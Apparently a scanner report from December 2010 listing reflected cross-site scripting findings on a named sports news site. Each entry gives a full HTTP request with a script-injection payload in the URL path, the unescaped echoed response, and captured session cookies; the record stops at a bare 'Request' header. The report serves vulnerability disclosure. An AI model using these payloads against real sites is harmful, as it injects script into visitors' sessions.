GET /12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html1dc77<script>alert(1)</script>063063ef963 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:29 GMT Content-Length: 812 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html1dc77<script>alert(1)</script>063063ef963"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b550d<script>alert(1)</script>cd7948c1da0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Give-it-a-rest-Rajon/landing_wakeup.htmlb550d<script>alert(1)</script>cd7948c1da0 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:34 GMT Content-Length: 793 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Give-it-a-rest-Rajon/landing_wakeup.htmlb550d<script>alert(1)</script>cd7948c1da0"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9ff3<script>alert(1)</script>c5ba4678e22 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.htmle9ff3<script>alert(1)</script>c5ba4678e22 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:31 GMT Content-Length: 813 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.htmle9ff3<script>alert(1)</script>c5ba4678e22"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73f49<script>alert(1)</script>e95cce5ad7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html73f49<script>alert(1)</script>e95cce5ad7c HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:33 GMT Content-Length: 810 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html73f49<script>alert(1)</script>e95cce5ad7c"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db6a8<script>alert(1)</script>f71ddd8b509 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.htmldb6a8<script>alert(1)</script>f71ddd8b509 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:33 GMT Content-Length: 814 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.htmldb6a8<script>alert(1)</script>f71ddd8b509"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 147a2<script>alert(1)</script>cc4a5edcaa0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html147a2<script>alert(1)</script>cc4a5edcaa0 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:31 GMT Content-Length: 803 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html147a2<script>alert(1)</script>cc4a5edcaa0"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 21c0a<script>alert(1)</script>8b224aad3ee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Another-day-another-injured-Celtic/landing.html21c0a<script>alert(1)</script>8b224aad3ee HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:39 GMT Content-Length: 800 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Another-day-another-injured-Celtic/landing.html21c0a<script>alert(1)</script>8b224aad3ee"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1452<script>alert(1)</script>0628ce0643 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.htmlf1452<script>alert(1)</script>0628ce0643 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:37 GMT Content-Length: 812 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.htmlf1452<script>alert(1)</script>0628ce0643"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 36d62<script>alert(1)</script>9a798494810 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html36d62<script>alert(1)</script>9a798494810 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:42 GMT Content-Length: 813 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html36d62<script>alert(1)</script>9a798494810"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6fd27<script>alert(1)</script>bd294f00767 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html6fd27<script>alert(1)</script>bd294f00767 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:39 GMT Content-Length: 807 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html6fd27<script>alert(1)</script>bd294f00767"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84b2b<script>alert(1)</script>d79d535a5e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html84b2b<script>alert(1)</script>d79d535a5e5 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:46 GMT Content-Length: 802 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html84b2b<script>alert(1)</script>d79d535a5e5"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6af4c<script>alert(1)</script>c8af04248e6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/NE-college-basketball-results-Saturday-D/landing.html6af4c<script>alert(1)</script>c8af04248e6 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:45 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/NE-college-basketball-results-Saturday-D/landing.html6af4c<script>alert(1)</script>c8af04248e6"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9f5ec<script>alert(1)</script>7fda45d1264 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html9f5ec<script>alert(1)</script>7fda45d1264 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:45 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html9f5ec<script>alert(1)</script>7fda45d1264"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f7e1<script>alert(1)</script>913944f674d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html5f7e1<script>alert(1)</script>913944f674d HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:47 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html5f7e1<script>alert(1)</script>913944f674d"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d65e<script>alert(1)</script>f9c2848c54d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html8d65e<script>alert(1)</script>f9c2848c54d HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:50 GMT Content-Length: 816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html8d65e<script>alert(1)</script>f9c2848c54d"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1bba6<script>alert(1)</script>c492eb7ddd9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html1bba6<script>alert(1)</script>c492eb7ddd9 HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:51 GMT Content-Length: 814 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html1bba6<script>alert(1)</script>c492eb7ddd9"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4a1a<script>alert(1)</script>d5197d4a79d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlf4a1a<script>alert(1)</script>d5197d4a79d HTTP/1.1 Host: www.csnne.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:50 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlf4a1a<script>alert(1)</script>d5197d4a79d"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9ad97<script>alert(1)</script>903d94b6357 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
